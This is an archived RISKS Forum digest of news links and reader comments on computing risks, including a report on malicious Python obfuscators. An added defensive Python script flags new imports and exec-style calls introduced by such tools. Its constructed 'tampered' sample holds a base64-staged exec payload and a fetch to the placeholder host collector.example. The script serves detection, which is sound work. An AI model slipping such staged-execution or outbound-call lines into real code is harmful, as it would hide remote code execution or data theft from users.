• Risks Digest 33.93 (1/2)

    From RISKS List Owner@21:1/5 to All on Sun Nov 12 04:45:34 2023
    RISKS-LIST: Risks-Forum Digest Saturday 11 November 2023 Volume 33 : Issue 93

    ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks) Peter G. Neumann, founder and still moderator

    ***** See last item for further information, disclaimers, caveats, etc. ***** This issue is archived at <http://www.risks.org> as
    <http://catless.ncl.ac.uk/Risks/33.93>
    The current issue can also be found at
    <http://www.csl.sri.com/users/risko/risks.txt>

    Contents:
    Man crushed to death by robot in South Korea (BBC News)
    Risk of all your communication eggs in one basket (Sundry)
    Recognizing Fake News Now a Required Subject in California Schools
    (IJPR)
    How Russian disinformation toppled multiple governments in Africa (WashPost)
    Russia fines Google $100 million, and Facebook parent company $27
    million, for content violations (The Washington Post)
    Cloudflare Outage: There's Plenty Of Blame To Go Around
    (Data Center Frontier)
    Essays: Decoupling for Security (Schneier on Security)
    U.S. Drones Are Flying Over Gaza to Aid in Hostage
    Recovery, Officials Say (The New York Times)
    Look, Up in the Sky! Amazon's Drones Are Delivering Cans
    of Soup! (*The New York Times*)
    Five big carmakers beat lawsuits alleging infotainment
    systems invade privacy (Ars Technica)
    Multiple Python Obscuration Tools that are not trustable
    (Ars Technica)
    Data on 267,000 Sarnia patients going back 3 decades among cyberattack
    thefts at 5 Ontario hospitals (CBC)
    Brothel compromises (Sundry items from Monty Solomon)
    Android 14's storage disaster gets patched, but your data might be gone
    (Ars Technica)
    Man vs. Musk: A Whistleblower Creates Headaches for Tesla (NYTimes)
    Don't trust *Find my apps* or location trackers like AirTags (WashPost)
    Why Banks Are Suddenly Closing Down Customer Accounts (NYTimes)
    Virginia State Police Prepares Team To Monitor Voter Removals (DCist)
    The impasse over who controls your car data (WashPost)
    This smart garage door controller is no longer very smart (The Verge)
    Critical vulnerability in Atlassian Confluence server is under *mass
    exploitation* (Ars Technica)
    Re: A $92,000 flying car can reach speeds of 63 miles
    (John Levine)
    Re: Toyota has built an EV with a fake transmission, and
    we've driven it (Martin Ward)
    Re: They Cracked the Code to a Locked USB Drive Worth
    $235 Million in Bitcoin. Then It Got Weird. (Dick Mills)
    Re: Comments on RISKS-33.92 (Jericho)
    Hiring: One Jamaican Bobsled Team -- and Weird Job
    Descriptions (Cliff Kilby)
    Abridged info on RISKS (comp.risks)

    ----------------------------------------------------------------------

    Date: Wed, 8 Nov 2023 18:19:37 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Man crushed to death by robot in South Korea
    (BBC News)

    A man has been crushed to death by a robot in South Korea after it failed to differentiate him from the boxes of food it was handling, reports say.

    https://www.bbc.com/news/world-asia-67354709

    ------------------------------

    Date: Wed, 8 Nov 2023 16:55:45 +1100
    From: Bruce Hunter <brucer.hunter@gmail.com>
    Subject: Risk of all your communication eggs in one basket

    Australia's second largest mobile and Internet service provider had a major outage across Australia today.

    https://www.smh.com.au/technology/what-caused-the-optus-outage-20231108-p5eiep.html?btis
    https://www.abc.net.au/news/2023-11-08/optus-outage-mobile-phones-internet-what-happened/103077180

    It was revealing how dependent our society is on the full functioning of our communication services.

    This outage affected public transport, `000' emergency calls (Australia's
    911) for Ambulance-Police-Fire Brigades, Two-factor authentication of
    websites, Uber, Taxis, Hospitals and the list goes on. People are
    scrounging for other ways to connect as most of our digital life is
    dependent on communication.

    In a hint at reducing the risk impact of NO communication services, Optus spokesperson said:

    "We are aware of some mobile phones having issues connecting to
    triple-0. *If Optus customers need to call emergency services, we suggest finding a family member or neighbour with an alternative device"!* [emphasis added]. To Optus' credit they have returned systems to operation in just 8 hours.

    Diversity is one of the key measures to improve reliability and
    resilience. I was lucky to continue on as my Internet was with a
    different provider to my mobile. As IoT, Cloud and 5G become the norm to
    "interconnectedness" we will experience more risks to our "normal" life. I
    just got to get a list of neighbours with an *alternative device*, just in
    case. ;-)

    [John Colville noted this item:
    More than 10 million customers were affected by the
    Optus outage (ABC):
    Service failed at 4am AEDT and took 14 hours to be close to completely
    recovered. No explanation yet as to cause. https://www.abc.net.au/news/2023-11-09/how-the-optus-outage-played-out/103079768
    PGN]

    ------------------------------

    Date: Sat, 11 Nov 2023 14:08:16 -0500
    From: Monty Solomon <monty@roscom.com>
    Subject: Recognizing Fake News Now a Required Subject in California
    Schools (IJPR)

    https://www.ijpr.org/media-society/2023-11-10/recognizing-fake-news-now-a-required-subject-in-california-schools

    ------------------------------

    Date: Sun, 5 Nov 2023 13:48:29 -0500
    From: Monty Solomon <monty@roscom.com>
    Subject: How Russian disinformation toppled multiple
    governments in Africa (WashPost)

    In the two years since an Israeli company first tried to thwart a Russian disinformation campaign in Burkina Faso, coups or rebels have removed the governments of five former French colonies, replacing them with pro-Russia leaders.

    https://www.washingtonpost.com/technology/2023/10/21/percepto-africa-france-russia-disinformation/

    ------------------------------

    Date: Sun, 26 Dec 2021 15:04:00 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Russia fines Google $100 million, and Facebook parent company $27
    million, for content violations (The Washington Post)

    MOSCOW — A Russian court fined Google nearly $100 million Friday for “systematic failure to remove banned content” — the largest such penalty yet
    in the country as Moscow attempts to rein in Western tech giants.

    The fine was calculated based on Google’s annual revenue, the court
    said. Roskomnadzor, Russia’s Internet regulator, told the court that Google’s 2020 turnover in the country exceeded 85 billion rubles, or about $1.15 billion.

    Meta Platforms, the parent company of Facebook and Instagram, was fined approximately $27 million, also for declining to remove banned content,
    several hours after the Google decision. Meta’s fine, like the one levied on Google, was tied to yearly revenue in Russia.

    The fines represent an escalation in Russia’s push to pressure foreign tech firms to comply with its increasingly strict rules on what it deems illegal content — particularly apps, websites, posts and videos related to jailed opposition leader Alexei Navalny’s network, which has been labeled as extremist in the country.

    https://www.washingtonpost.com/world/2021/12/24/google-russia-fine-banned-content/

    ------------------------------

    Date: Wed, 8 Nov 2023 14:56:29 +0000
    From: Victor Miller <victorsmiller@gmail.com>
    Subject: Cloudflare Outage: There's Plenty Of Blame To Go Around
    (Data Center Frontier)

    https://www.datacenterfrontier.com/cloud/article/33014487/cloudflare-outage-theres-plenty-of-blame-to-go-around

    ------------------------------

    Date: Wed, 8 Nov 2023 14:43:54 +0000
    From: Victor Miller <victorsmiller@gmail.com>
    Subject: Essays: Decoupling for Security (Schneier on Security)

    https://www.schneier.com/essays/archives/2023/11/decoupling-for-security.html

    ------------------------------

    Date: Sun, 5 Nov 2023 22:25:32 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: U.S. Drones Are Flying Over Gaza to Aid in Hostage
    Recovery, Officials Say (The New York Times)

    The military has been sending weapons and advisers to Israel, but the
    flights suggest a more active American role.

    Approximate paths of American military drone flights over the Gaza
    Strip. Flights shown here are from Oct. 28 to Nov. 2, of which at least six flights were over Gaza.

    Source: Flight path data from FlightRadar24. Paths are approximate based on each flight's reported position about every minute.

    https://www.nytimes.com/2023/11/02/world/middleeast/israel-hamas-gaza-hostages-us.html?smid=nytcore-ios-share&referringSource=articleShare

    [Military drones are tracked by FlightRadar24? That doesn't seem like a
    good idea...]

    ------------------------------

    Date: Sat, 4 Nov 2023 19:26:46 -0400
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Look, Up in the Sky! Amazon's Drones Are
    Delivering Cans of Soup! (*The New York Times*)

    Amazon’s much-hyped drone project is dropping small objects on
    driveways. Some customers are not sure what it delivers beyond minestrone.

    Only one item can be delivered at a time. It can’t weigh over five
    pounds. It can’t be too big. It can’t be something breakable, since the drone drops it from 12 feet. The drones can’t fly when it is too hot or too windy or too rainy.

    The Texas weather plays havoc with important deliveries. Mr. Lord, a 54-year-old professor of civil engineering at Texas A&M, ordered a
    medication through the mail. By the time he retrieved the package, the drug
    had melted. He’s hopeful that the drones can eventually handle problems like this.

    “I still view this program positively knowing that it is in the experimental phase,” he said.

    https://www.nytimes.com/2023/11/04/technology/amazon-drone-delivery.html

    The risk? Bezos fortune? Nah. Looking stupid? We'll see...

    [Who gets sued if the 5-pound can of soup happens to kill the house owner?
    What if a poor homeless person is stealing deliveries? What about reports
    of thieves who are tracking delivery vehicles? PGN]

    ------------------------------

    Date: Fri, 10 Nov 2023 01:14:09 -0500
    From: Monty Solomon <monty@roscom.com>
    Subject: Five big carmakers beat lawsuits alleging infotainment
    systems invade privacy (Ars Technica)

    https://arstechnica.com/?p=1982702

    ------------------------------

    Date: Thu, 9 Nov 2023 06:19:25 -0500
    From: Bob Gezelter <gezelter@rlgsc.com>
    Subject: Multiple Python Obscuration Tools that are not trustable
    (Ars Technica)

    Scripting languages do not use compilers, but applications written in
    scripting languages, e.g., Python, often use compression and obfuscation
    tools both to reduce download volume and simultaneously increase the
    difficulty and effort of reverse engineering. Such tools have a long
    history; I remember a PL/I source compressor program back in the late 1970s.

    I remember an item in ACM SIGPLAN from slightly later on the subject of
    whether one can trust a compiler not to insert malevolent object code.

    Obfuscators and compressors, in this regard, are effectively compilers. They
    have the potential to insert foreign logic into the processed scripts.

    ArsTechnica has reported that the security firm Checkmarx has identified
    eight malevolent Python obfuscators that have been in active circulation
    since January of this year, inserting code to activate cameras, steal
    passwords, download files, and perform other severely compromising actions.

    Just because a script is not compiled does not mean that it cannot be
    compromised.

    The ArsTechnica article can be found at: https://arstechnica.com/security/2023/11/developers-targeted-with-malware-that-monitors-their-every-move/
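    An added check in the spirit of the item above (example code written for
    this edit; it is not from the RISKS post, the Checkmarx report or the Ars
    Technica article): treat the obfuscator or minifier as an untrusted
    compiler and diff what its output can reach against what its input could
    reach, using Python's own `ast` module. New imports and newly introduced
    dynamic-execution builtins (`exec`, `compile`, `__import__`, ...) are the
    signature of "foreign logic" appended by the tool. The three sample
    scripts are constructed for the example, `collector.example` is a
    placeholder host, and a tool whose legitimate output is itself an
    `exec` wrapper would need that wrapper added to the baseline first.

```python
"""Added example: diff the capabilities of a script before and after an
obfuscation/minification tool touched it.  The sample scripts below are
constructed for this example; they are not the packages Checkmarx reported."""
import ast

# Builtins that let a script run something not visible in its source text.
DYNAMIC_PRIMITIVES = {"exec", "eval", "compile", "__import__",
                      "getattr", "globals", "vars"}


def profile(source: str):
    """Return (top-level modules imported, dynamic primitives called)."""
    imports, dynamic = set(), set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            imports.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imports.add(node.module.split(".")[0])
        elif isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
            name = node.func.id
            if name in DYNAMIC_PRIMITIVES:
                dynamic.add(name)
            # __import__("mod") with a string literal still names the module.
            if (name == "__import__" and node.args
                    and isinstance(node.args[0], ast.Constant)
                    and isinstance(node.args[0].value, str)):
                imports.add(node.args[0].value.split(".")[0])
    return imports, dynamic


def added_behaviour(original: str, processed: str) -> dict:
    """What the processed script can reach that the original could not."""
    o_imp, o_dyn = profile(original)
    p_imp, p_dyn = profile(processed)
    return {"new_imports": sorted(p_imp - o_imp),
            "new_dynamic": sorted(p_dyn - o_dyn)}


# Constructed input: the script a developer hands to the tool.
ORIGINAL = '''
import json
import os

def load_config(path):
    with open(os.path.join(path, "config.json")) as fh:
        return json.load(fh)
'''

# Constructed output of an honest minifier: renamed, reflowed, same reach.
MINIFIED = (
    'import json\nimport os\n'
    'def a(b):\n with open(os.path.join(b,"config.json")) as c:return json.load(c)\n'
)

# Constructed output of a tampered tool: a staged payload and an exfil
# function were appended.  The base64 decodes to the harmless "pass".
TAMPERED = MINIFIED + (
    'import urllib.request\n'
    '_p=b"cGFzcw=="\n'
    'exec(compile(__import__("base64").b64decode(_p),"<stage>","exec"))\n'
    'def d():return urllib.request.urlopen("http://collector.example/x")\n'
)

if __name__ == "__main__":
    print("honest minifier:", added_behaviour(ORIGINAL, MINIFIED))
    print("tampered tool:  ", added_behaviour(ORIGINAL, TAMPERED))
```

    This only inspects the tool's output; since the tools the item describes
    act on the developer's machine when run, the tool itself should still be
    executed in a throwaway environment, and any flagged import or primitive
    is a reason to read the output by hand, not a verdict.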

    ------------------------------

    Date: Thu, 9 Nov 2023 12:24:50 -0700
    From: Matthew Kruk <mkrukg@gmail.com>
    Subject: Data on 267,000 Sarnia patients going back 3
    decades among cyberattack thefts at 5 Ontario hospitals
    (CBC)

    https://www.cbc.ca/news/canada/windsor/hospital-cyber-update-data-1.7023826

    Patients' information -- including the reasons for their visits -- going
    back three decades from Bluewater Health in Sarnia, Ont., and its
    predecessor hospitals is among the data confirmed stolen in the cyberattack
    on five southwestern Ontario hospitals.

    Transform, the hospital's IT provider, now confirms a database report containing information on 267,000 patients was taken. The report includes details about "every patient" seen at Bluewater Health and its
    predecessors since Feb. 24, 1992.

    ------------------------------

    Date: Fri, 10 Nov 2023 16:54:11 -0500
    From: Monty Solomon <monty@roscom.com>
    Subject: Brothel compromises (Sundry items)

    3 Charged With Running Prostitution Service Used by
    Politicians and Others https://www.nytimes.com/2023/11/08/us/politics/justice-department-brothel.html

    Prosecutors say brothel suspect also collected possibly fraudulent COVID
    funds. Investigators believe James Lee used several business and related
    bank accounts to “launder the proceeds of the prostitution business,” court documents show. https://www.boston.com/news/crime/2023/11/10/prosecutors-brothel-suspect-collected-possibly-fraudulent-covid-funds/

    Exposure of brothels that catered to the elite spotlights how legal system treats buyers and sellers in sex trade https://www.bostonglobe.com/2023/11/10/metro/brothel-bust-massachusetts-legal-system/

    Affidavit details how investigators discovered brothel ring that allegedly catered to wealthy in Boston area and Virginia https://www.bostonglobe.com/2023/11/09/metro/brothel-bust-boston/

    ------------------------------

    Date: Tue, 7 Nov 2023 10:42:39 -0800
    From: Lauren Weinstein <lauren@vortex.com>
    Subject: Android 14's storage disaster gets patched, but your data might be
    gone (Ars Technica)

    https://arstechnica.com/gadgets/2023/11/android-14-patches-ransomware-storage-bug-but-some-users-will-lose-data/?utm_brand=arstechnica&utm_social-type=owned&utm_source=mastodon&utm_medium=sociald

    ------------------------------

    Date: Fri, 10 Nov 2023 14:50:02 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Man vs. Musk: A Whistleblower Creates Headaches for Tesla
    (The New York Times)

    Man vs. Musk: A Whistleblower Creates Headaches for Tesla. An employee who
    was fired after expressing safety concerns leaked personnel records and sensitive data about driver-assistance software.

    A day after Lukasz Krupski put out a fire at a Tesla car delivery location
    in Norway, seriously burning his hands and preventing a disaster, he got an email from Elon Musk.

    “Congratulations for saving the day!” Mr. Musk, Tesla’s chief executive, wrote in March 2019.

    But what started as a story about a heroic employee and a grateful employer
    has devolved into an epic battle between the carmaker and Mr. Krupski, a service technician. The fight has spawned lawsuits in Norway and the United States and caught the attention of regulators in several countries.

    After initially being hailed as a savior, Mr. Krupski said in an interview
    with The New York Times, he was harassed, threatened and eventually fired
    after complaining about what he considered grave safety problems at his workplace near Oslo. Mr. Krupski, originally from Poland, was part of a crew that helped prepare Teslas for buyers but became so frustrated with the
    company that last year he handed over reams of data from the carmaker’s computer system to Handelsblatt, a German business newspaper.

    https://www.nytimes.com/2023/11/10/business/tesla-whistleblower-elon-musk.html?smid=nytcore-ios-share&referringSource=articleShare

    ------------------------------

    Date: Wed, 8 Nov 2023 06:51:35 -0700
    From: Jim Reisert AD1C <jjreisert@alum.mit.edu>
    Subject: Don't trust *Find my apps* or location trackers
    like AirTags (WashPost)

    By Shira Ovide, *The Washington Post*, 7 Nov 2023

    Two dangerous cases of mistaken identity using the Find My app showed that location-tracking technology can be useful -- but it cannot be trusted.

    https://www.washingtonpost.com/technology/2023/11/07/tracking-find-my-apps-accuracy/

    Prosecutors say that a teenager and two friends set fire to a Denver home
    where he believed Apple’s Find My app showed his stolen iPhone.
    The teen later realized that the location data pinpointed the wrong house, according to prosecutors. Two of the teens are facing murder charges.

    Last year, a SWAT team in Denver looking for a truck with stolen guns and an iPhone mistakenly raided the home of a 77-year-old woman. A lawyer for the woman, Ruby Johnson, says police relied on location data from the Find My
    app that took them to the wrong house. (The Denver Police Department
    declined to comment.)

    Location tracking information in Apple’s Find My technology and similar software for Android phones can be incredibly useful, as are location
    trackers such as Tile and Apple AirTags that can help find your keys buried
    in the sofa cushions.

    But as the two cases in Denver show, those location identifying technologies are not always accurate and the consequences can be dire.

    The bottom line: You shouldn’t entirely trust location identifying technology.

    ------------------------------

    Date: Sun, 5 Nov 2023 22:23:56 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Why Banks Are Suddenly Closing Down Customer Accounts
    (*The New York Times*)

    Surprised individuals and small-business owners can’t pay rent or make payroll, and no one ever explains what they did wrong.

    https://www.nytimes.com/2023/11/05/business/banks-accounts-close-suddenly.html

    ------------------------------

    Date: Tue, 7 Nov 2023 17:35:25 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: Virginia State Police Prepares Team To Monitor Voter
    Removals (DCist)

    Virginia is the only state in the U.S. where people who’ve committed any felony automatically lose their right to vote unless the governor restores
    it, according to the Brennan Center for Justice.

    In September, VPM News reported on an Arlington County man who’d had his rights restored by former Gov. Ralph Northam, but had been stricken from the voter rolls after a probation violation.

    State officials at ELECT and the Virginia State Police initially denied
    there was a systemic problem. The next week, they acknowledged the error; a spokesperson of Gov. Glenn Youngkin estimated it affected fewer than 300 people. But on 27 Oct 2023, ELECT said the total was more than 10 times that estimate.

    Same-day registration on Election Day can only happen at a voter’s polling place, which can be found online or by calling a local election office. This
    is the second general election to take advantage of the process, which
    passed the then Democrat-controlled General Assembly along party lines in 2020.

    https://dcist.com/story/23/11/07/virginia-voter-removal-2023-election-state-police-watch-team

    ------------------------------

    Date: Fri, 10 Nov 2023 14:01:17 -0500
    From: Gabe Goldberg <gabe@gabegold.com>
    Subject: The impasse over who controls your car data (WashPost)

    CitySide Subaru, a car dealership in the Boston area, regularly loses
    potential customers for a surprising reason: Subaru has disabled some of its own software in a stalemate over control of data from your car.

    That means no automatic emergency calls if the car crashes, no wireless notifications from the dealer about maintenance problems and no option to remotely start the car and fire up the heater. (Don’t judge. It’s cold in Massachusetts.)

    Nathan White, CitySide’s general manager, said his staff warns car shoppers that features like those requiring wireless transmission don’t work on new Subaru models sold in the state.

    The lack of those features is a “conversation we have to have with the customer,” White said. “To be honest with you, it’s a couple of percent a month” in lost vehicle sales. [...]

    “This all comes down to who owns the information,” White said. “Shouldn't
    the customer have some say?”

    https://s2.washingtonpost.com/camp-rw/?trackId=596b22969bbc0f403f8bcc25&s=654e689d8c1e4d00e8e615

    ------------------------------

    Date: Wed, 8 Nov 2023 00:22:29 -0500
    From: Monty Solomon <monty@roscom.com>
    Subject: This smart garage door controller is no longer very smart
    (The Verge)

    https://www.theverge.com/23949612/chamberlain-myq-smart-garage-door-controller-homebridge-integrations

    ------------------------------

    Date: Wed, 8 Nov 2023 00:46:04 -0500
    From: Monty Solomon <monty@roscom.com>
    Subject: Critical vulnerability in Atlassian Confluence
    server is under *mass exploitation* (Ars Technica)

    https://arstechnica.com/security/2023/11/critical-vulnerability-in-atlassian-confluence-server-is-under-mass-exploitation/

    ------------------------------

    Date: 29 Dec 2021 19:26:32 -0500
    From: "John Levine" <johnl@iecc.com>
    Subject: Re: A $92,000 flying car can reach speeds of 63 miles
    per hour (Business Insider, RISKS-33.92)

    Perhaps we can try and collect all the reasons why a flying car that can
    only go 20 miles before it falls out of the sky is a bad idea.

    How is it licenced? Is it a car, a plane, or something else?

    How high can it go? There's one set of problems flying close to
    the ground (running into obstacles), a different set flying
    higher up (running into airplanes), etc.

    I happen to live near a lake which is about 30 miles long and a mile wide,
    so something that let me go directly across the lake rather than around one
    end or the other might be useful, but I'm having trouble thinking of other scenarios for this thing.

    ------------------------------

    Date: Mon, 6 Nov 2023 13:02:10 +0000
    From: Martin Ward <mwardgkc@gmail.com>
    Subject: Re: Toyota has built an EV with a fake transmission, and
    we've driven it (Ars Technica)

    Do you get bored driving your electric car with nothing to do but
    maintain your speed and direction and keep your attention on other
    road users and driving conditions?

    Well, Toyota has added a computer game that you can play as you drive! (TOY-ota, get it?) Instead of a mouse and keyboard this game has an extra pedal and joystick as game interfaces for you to play with, and plays full volume game sound through the car's sound system. Best of all, if you mess
    up one of the moves in the game, the car will actually stop accelerating, or even suddenly stall!

    I think that they should add a warning message for other road users
    (similar to those on driving instructor's cars): "Please keep your
    distance. Driver is playing a computer game while driving. Car may stall
    suddenly."

    Children used to stick cards in their bikes, so that they would make fake
    motorbike noises as the card flaps against the spokes of the wheels. I
    suppose this is the "grown ups" version, but with added danger to other
    road users. The, ahem, "young at heart" reporter at Ars Technica says that
    "it made things so much more fun"!

    ------------------------------

    Date: Mon, 6 Nov 2023 17:14:52 -0500
    From: Dick Mills <dickandlibbymills@gmail.com>
    Subject: Re: They Cracked the Code to a Locked USB Drive Worth
    $235 Million in Bitcoin. Then It Got Weird. (RISKS-33.92)

    The *Wired* article makes a good read. It gives details on how one company cracked the encryption of the locked USB drive, in part by examining a
    sample of the drive.

    It has been many years since I recall reading on this risks forum that
    security through obscurity was foolish and futile. The USB drive
    manufacturer should have been able to open source everything without
    compromising security. Here's a quote from Risks 12:25: "Within the Multics
    community, anything less than a complete willingness to hand critical code
    over to any hacker who asked for it was demeaningly referred to as "security
    through obscurity," and was avoided at all cost."

    A year ago, I had to cancel my LastPass account because their obscure
    secrets were compromised.

    Is the doctrine ridiculing security through obscurity dead?

    [Nice reminder. Yes, it is widely ignored today. Dick, Tom Van Vleck,
    and I are among the few remaining early Multicians who still contribute
    to RISKS. And I am the pain-in-the-ass Multician who keeps reminding
    RISKS readers that the Multics hardware and operating system completely
    resolved the stack buffer-overflow problem in 1965 -- a wonderful
    visionary leap into the future that has been almost completely ignored
    by almost everyone else. But I believe that Multicians never forget
    (like elephants?), because the principled development was so
    pervasive. PGN]

    ------------------------------

    Date: Sun, 5 Nov 2023 23:11:29 -0700
    From: "Jared E. Richo" <jericho@attrition.org>
    Subject: Re: Comments on RISKS-33.92

    Abridged comments, to remind us to scrutinize and be critical of the news
    we read, if you'll permit. Almost a 30-year reader of RISKS, this issue
    just hit all the right buttons for a reply to the entire thing, which is
    a first for me, a professional critic of sorts. -- jericho

    [Jericho, Thanks for your comments. I decided to run most of them, as a
    reminder to myself. Everything is indeed tumbling down.. PGN]

    Subject: Apple Disables Maps Features in Israel and Gaza

    Meanwhile, doesn't disable in other conflict regions?

    Subject: California halts operations of Cruise self-driving robotaxis

    Meanwhile, allows ex-DUI and elderly that cannot pass a current eye exam to drive.

    Subject: Overview of the iLeakage Attack (Jason Kim et al.)

    Eh.. Spectre-evolved? Or are you really claiming Apple ignored Spectre,
    Spectre v2, Spectre v3 / SPECTRE-NG, Spectre v4 / SPECTRE-NG, Spectre v5 / ret2spec, Spectre-BHB...

    Subject: AI Firms Must Be Held Responsible for Harm They Cause,
    'Godfathers' Say (Dan Milmo)

    Sorry... "godfather" implies at least two generations, if not three. Modern so-called "AI" is still an infant. You already abused the term "AI", you
    don't get to abuse more terms.

    Subject: President Biden Issues Executive Order on Safe, Secure, and
    Trustworthy Artificial Intelligence (Whitehouse.gov)

    "Trustworthy Artificial Intelligence" .. oxymoron.

    Subject: Executive Order on AI

    In an op-ed for Bloomberg Law, EPIC's Executive Director Alan Butler
    argued for the need for an overriding federal privacy law.

    But better than ECPA, COPPA, GLBA, HIPAA, FERPA... right?

    Subject: Humans Find AI-Generated Faces More Trustworthy
    Than the Real Thing (Scientific American)

    Big surprise here! As Joe Navarro tells us in his most basic of books,
    humans are -trained- to lie from a shockingly early age. AI isn't explicitly trained to, but it is programmed by the humans that are.

    Subject: AI Muddies Israel-Hamas War in Unexpected Way (NYTimes)

    Subject: AI generated allegations against Big Four consulting firms

    Ibid.

    Subject: Meta Accused by States of Using Features to Lure Children to
    Instagram and Facebook (NYTimes)

    Eh, not like history has shown us they don't care. Now they are getting in
    on the game?

    Subject: FCC robocall enforcement does little to stop illegal calls,
    Senate hears

    Hundreds of millions could have testified a decade ago.

    Subject: Amazon, Microsoft, and India crack down on tech support scams

    Meanwhile, many customers interfacing with the actual support channels still feel it is a scam.

    Date: Sun, 29 Oct 2023 11:40:02 -0400
    Subject: Top Philips Executive Approved Sale of Defective Breathing
    Machines by Distributors, Despite Tests Showing Health Risks
    (ProPublica)

    Pharmacom only cares about profit, news at 11.

    Subject: How a Big Pharma Company Stalled a Potentially Lifesaving
    Vaccine in Pursuit of Bigger Profits (ProPublica)

    Ibid.

    Subject: How a Lucrative Surgery Took Off Online and Disfigured Patients

    If doctors fall for this crap, does society stand a chance?

    ------------------------------

    Date: Sat, 11 Nov 2023 15:42:13 -0500
    From: Cliff Kilby <cliffjkilby@gmail.com>
    Subject: Hiring: One Jamaican Bobsled Team -- and Weird Job Descriptions

    I am in the market for employment again, and the job postings are amusing.
    I thought it might be helpful to discuss it a bit. I am a security professional, with a specialization in process management. I happen to also have a background in Linux operations, and development. I have even done networking (IPv4, and TIA 568A).

    These were all separate jobs. I am bemused that the industry has seemed to
    move in the direction that professionals are expected to do all those at
    once, and somehow maintain proficiency in any of them.

    The following are excerpts from job postings. Each job posting is for a
    single position.

    This is two jobs:
    Remediation management (e.g., Vulnerability [Web, Database, OS] and Plan of Action and Milestones [POA&M]).

    Vulnerability management should not include project management. If your security department is tracking milestones for deliverability of
    remediation, they are no longer performing security.

    This is two jobs, and a ludicrous expectation:
    *Cloud Security* Essentials in at least 1 of *AWS, GCP or Azure*. Working knowledge of GCP and Azure.

    Knowing the limitations and usages of a cloud platform is a job. Knowing
    two, is two jobs. Knowing two and being certified in a third is ludicrous.
    This is at least four jobs

    Build security tools and automation for critical corporate infrastructure protection, monitoring, and remediation.
    Develop DevOps pipelines and mature the SDLC process.

    Security professionals do not develop security tools. Developers develop. Security professionals issue guidance and perform auditing and reporting on controls. Security is not DevOps, which was already more than two jobs.
    SDLC management is development, ensuring it works is operations, validating that it exists is security.

    This one is my favorite. 19,000,005 jobs. The listing is for a SOC Incident Handler:
    Restores environment after an incident and ensures that the managed
    security service has thorough detection capabilities in place for emerging threats.
    Performs service requests from internal/external teams.
    Maintains an advanced understanding of cyber security threats,
    vulnerabilities, attacks, responsible groups, motivations and techniques.
    SOC is an operations monitoring center. Restoring an environment is
    operations. Validating detection rules, that's reasonable. Service requests
    are helpdesk, maybe smart hands. If your operations monitoring center is
    performing operations, they are no longer monitoring. This is a violation of
    the Two-man rule (the language is older than I am). Gathering data to create
    security detections, that's a job. Analysis of security vulnerabilities,
    that's a job. Analysis of *responsible groups, motivations and techniques*,
    that's a government.

    This is *a* [single!] job:
    *Performs a combination of duties in accordance with departmental
    guidelines:*

    - Leads the development of data security strategies and designs data
    security architecture for CNA IT systems that aligns with CNA Secure Data
    Strategy, embedding security into the overall approach and vision for
    data across the enterprise.

    - Participates in the creation, update and review of corporate security
    policies and technology standards for data security.

    - Creates and maintains the information security technology standards to
    align with corporate data security policies and standards

    - Develops and maintains data security solution and technology roadmaps for
    structured and unstructured data discovery, classification, protection
    and data rights management on premise and in the Cloud.

    - Develops, maintains and governs the reusable data security framework and
    design patterns

    - Develops the enterprise security solutions that deliver Secure Data
    Analytics, collecting and analyzing business and event data to drive
    security value and enabling the utilization of data as a business asset.

    - In collaboration with Information Security and Legal, design solutions
    and processes to resolve current and potential legal and regulatory
    issues affecting information security and assesses their impact on CNA's
    security and technology teams.

    - Contributes to general enterprise architecture framework and strategy

    [continued in next message]
